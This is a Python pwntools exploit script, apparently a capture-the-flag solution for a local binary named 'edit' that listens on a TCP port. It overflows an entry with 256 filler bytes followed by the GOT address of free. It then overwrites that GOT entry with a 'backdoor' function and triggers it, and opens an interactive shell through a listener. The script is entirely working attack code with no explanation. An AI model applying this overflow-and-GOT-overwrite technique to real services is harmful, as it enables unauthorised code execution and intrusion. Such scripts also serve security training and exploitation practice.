program/input/edit.py

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

from pwn import *
context.clear(arch='amd64', os='linux', log_level='info')

elf = ELF('./edit')

sh = listen(12012)

tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'ADD aaaa')
tcpClient.close()

tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'EDIT aaaa ' + b'a' * 256 + p64(elf.got['free']))
tcpClient.close()

tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'SHOW')
tcpClient.recvline()
index_str = tcpClient.recvline()[:-1]
tcpClient.close()

tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'EDIT ' + index_str + b' ' + p64(elf.sym['backdoor']))
tcpClient.close()

tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'DEL ' + p64(elf.sym['backdoor'])[:3])
tcpClient.close()

sh.interactive()